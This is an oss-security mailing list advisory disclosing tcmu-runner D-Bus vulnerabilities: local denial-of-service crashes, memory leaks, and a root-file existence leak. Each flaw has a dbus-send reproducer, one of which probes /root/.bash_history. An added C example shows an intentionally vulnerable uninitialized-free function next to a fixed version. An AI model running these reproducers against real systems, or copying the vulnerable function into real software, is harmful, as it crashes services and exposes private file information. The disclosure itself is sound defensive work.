Message-ID: <20170724101204.GA22772@f195.suse.de>
Date: Mon, 24 Jul 2017 12:12:04 +0200
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: tcmu-runner: multiple vulnerabilities in tcmu-runner daemon allowing
 local DoS, information leak and a memory leak

A security audit of tcmu-runner's D-Bus service implementation showed a
number of security issues.

I've requested CVEs for these issues, request is still pending. I will
update once I've got them.

It seems upstream will remove the D-Bus interface completely from the
tcmu-runner daemon in the future.

Package: https://github.com/open-iscsi/tcmu-runner

------------------------------------------------------------------------
glfs handler allows local DoS via crafted CheckConfig strings
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_glfs.so and cause various kinds of segmentation faults,
depending on the string passed to the method.

For example the "hosts" variable in glfs_check_config() is not zero
initialized, but always freed on error, causing invalid free and/or
invalid memory accesses.

References:

- The check_config callback implementation was recently removed upstream
  in this commit:

  https://github.com/open-iscsi/tcmu-runner/commit/61bd03e600d2abf309173e9186f4d465bb1b7157

- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049485

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/glfs org.kernel.TCMUService1.CheckConfig string:something
# -> tcmu-runner daemon will have crashed with segmentation fault
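The pattern behind this crash, shown as an added example of my own rather than tcmu-runner code: a shared cleanup label that frees a pointer which only the later code paths ever assign, next to the hardened form. The "volume@host/path" syntax, the function names and the return codes are assumptions made for this example and are not the real glfs handler config format; the vulnerable function is included to read, not to run.

```c
#define _POSIX_C_SOURCE 200809L   /* for strndup() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Vulnerable shape (do not call): mirrors the glfs_check_config() bug above.
 * "hosts" is declared without an initializer, the early validation failures
 * jump straight to the cleanup label, and the cleanup label frees "hosts"
 * unconditionally. A string like "something" never reaches strndup(), so
 * free() receives whatever the stack happened to hold: an invalid free that
 * typically ends in a segmentation fault inside the allocator.
 */
int check_config_vulnerable(const char *cfg)
{
    char *hosts;                      /* not zero-initialized */
    const char *at, *slash;
    int ret = -1;

    at = strchr(cfg, '@');
    if (!at)
        goto out;                     /* hosts still uninitialized here */
    slash = strchr(at + 1, '/');
    if (!slash)
        goto out;                     /* ...and here */
    hosts = strndup(at + 1, (size_t)(slash - at - 1));
    if (!hosts)
        goto out;
    ret = (*hosts != '\0' && slash[1] != '\0') ? 0 : -1;
out:
    free(hosts);                      /* wild pointer on the early error paths */
    return ret;
}

/*
 * Hardened shape: every pointer that the cleanup label frees starts as NULL,
 * and the argument itself is validated before it is dereferenced. free(NULL)
 * is defined as a no-op, so one cleanup label is then safe on every path.
 * Returns 0 for a well-formed "volume@host/path" string and -1 otherwise
 * (assumed syntax for this example only).
 */
int check_config_fixed(const char *cfg)
{
    char *hosts = NULL;
    const char *at, *slash;
    int ret = -1;

    if (!cfg || *cfg == '\0')
        return -1;
    at = strchr(cfg, '@');
    if (!at || at == cfg)             /* no '@' or empty volume */
        goto out;
    slash = strchr(at + 1, '/');
    if (!slash || slash == at + 1)    /* no '/' or empty host */
        goto out;
    hosts = strndup(at + 1, (size_t)(slash - at - 1));
    if (!hosts)
        goto out;
    if (slash[1] == '\0')             /* empty path */
        goto out;
    ret = 0;
out:
    free(hosts);                      /* NULL or a valid allocation */
    return ret;
}

int main(void)
{
    /* constructed inputs, including the "something" string from the reproducer */
    const char *inputs[] = { "vol@host/disk.img", "something", "vol@/x", "vol@host/" };
    for (size_t i = 0; i < sizeof(inputs) / sizeof(inputs[0]); i++)
        printf("%-20s -> %d\n", inputs[i], check_config_fixed(inputs[i]));
    return 0;
}
```

The important property is that the strings reaching check_config over the system bus are attacker-controlled, so every early exit in the parser is a path an unprivileged caller can pick at will; initializing to NULL is what makes the single cleanup label safe regardless of which exit was taken.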

------------------------------------------------------------------------
UnregisterHandler dbus method in tcmu-runner daemon for non-existing
handler causes DoS
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of an unknown tcmu-runner handler as parameter and cause a NULL
pointer dereference.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/e2d953050766ac538615a811c64b34358614edce
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049488

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/HandlerManager1 org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:fake_handler
# -> tcmu-runner daemon will have crashed with segmentation fault



------------------------------------------------------------------------
UnregisterHandler D-Bus method in tcmu-runner daemon for internal
handler causes DoS
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of a handler loaded internally in tcmu-runner via dlopen() and
cause a NULL pointer dereference resulting in DoS.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/bb80e9c7a798f035768260ebdadffb6eb0786178
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049489

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user, it will attempt to unregister the
# locally loaded qcow handler
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/HandlerManager1 org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:qcow
# -> tcmu-runner daemon will have crashed with segmentation fault


------------------------------------------------------------------------
Memory leaks can be triggered in tcmu-runner daemon by calling D-Bus
method for (Un)RegisterHandler
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
RegisterHandler or UnregisterHandler methods implemented in the
tcmu-runner daemon to trigger memory leaks. Doing so repeatedly would
cause a root daemon to hog memory, possibly resulting in DoS for the
daemon itself or other system components that fail to acquire memory as
a result.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/7a78eda52d973d3edc06fea84ad874678d6055f0
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049490

Reproducer:

# *stop* the tcmu-runner service as root
systemctl stop tcmu-runner.service
# run the tcmu-runner service as root in valgrind
valgrind --max-stackframe=2097208 --leak-check=full /usr/bin/tcmu-runner
# run this dbus command multiple times as a regular user (this will trigger
# the leak in RegisterHandler)
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/HandlerManager1 org.kernel.TCMUService1.HandlerManager1.RegisterHandler string:0memory string:stuff
# ctrl-c the valgrind process and you'll see an amount of "definitely lost"
# bytes. when doing the same without the dbus-send calls this should be zero
# "definitely lost" bytes



------------------------------------------------------------------------
qcow handler opens up an information leak via the CheckConfig D-Bus
method
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_qcow.so and exploit an information leak by passing in arbitrary
filenames to check.

This allows a local user to check for the existence of root owned files,
which might enable more serious security issues in combination with
other security flaws in a system.

References:

- upstream fix:

  This one is difficult to fix, upstream asked me to remove all
  check_config callbacks instead:

  https://github.com/open-iscsi/tcmu-runner/commit/8cf8208775022301adaa59c240bb7f93742d1329

- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049491

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/qcow org.kernel.TCMUService1.CheckConfig string://root/.bash_history
# this will return True if /root/.bash_history exists, False otherwise

Regards

Matthias

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Dipl.-Wirtsch.-Inf. (FH), Security Engineer
https://www.suse.com/security
Telefon: +49 911 740 53 290

SUSE Linux GmbH 
GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nuernberg)
